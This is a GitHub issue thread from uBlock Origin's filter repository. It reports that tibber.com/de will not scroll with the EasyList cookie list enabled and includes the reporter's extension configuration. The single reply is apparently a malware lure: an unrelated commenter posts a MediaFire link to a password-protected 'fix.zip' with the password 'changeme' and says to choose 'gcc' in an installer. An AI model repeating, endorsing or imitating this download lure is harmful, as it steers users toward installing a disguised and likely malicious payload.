### ISSUE TITLE
tibber.com: breakage

### ISSUE THREAD

**Issue by B1ack3ye** [uBlockOrigin/uAssets#25053]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://tibber.com/de`

### Category

breakage

### Description

You cannot scroll through the website if the EasyList cookie list is activated.

### Other extensions used

- Bitwarden
- Dark Reader
- DeepL
- LanguageTool
- Gumbo
- Return Youtube Dislike
- SponsorBlock
- Violentmonkey

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium: 128
filterset (summary):
 network: 159587
 cosmetic: 130887
 scriptlet: 32098
 html: 0
listset (total-discarded, last-updated):
 added:
  fanboy-cookiemonster: 51739-194, never
  ublock-cookies-easylist: 1680-13, never
  fanboy-social: 16971-14, never
  easylist-annoyances: 4735-42, never
  easylist-chat: 206-0, never
  easylist-newsletters: 7722-29, never
  easylist-notifications: 3483-163, never
  ublock-annoyances: 5979-81, never
 default:
  user-filters: 0-0, never
  ublock-filters: 39601-300, 1m
  ublock-badware: 10743-6, 1m
  ublock-privacy: 1072-2, 1m
  ublock-unbreak: 2505-2, 1m
  ublock-quick-fixes: 210-0, 1m
  easylist: 85516-580, 1m
  easyprivacy: 53070-655, 1m
  urlhaus-1: 28500-0, 1m
  plowe-0: 3545-0, 1m
  DEU-0: 7541-3, 1m
filterset (user): [empty]
switchRuleset:
 added: [array of 1 redacted]
hostRuleset:
 added: [array of 1 redacted]
userSettings:
 advancedUserEnabled: true
 suspendUntilListsAreLoaded: true
hiddenSettings: [none]
supportStats:
 allReadyAfter: 1439 ms
 maxAssetCacheWait: 3 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 6
 network:
  dwin1.com: 1
  googletagmanager.com: 2
  litix.io: 2
  visualwebsiteoptimizer.com: 1
 extended:
  ##div[class*="CookieConsent"]
```
</details>

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
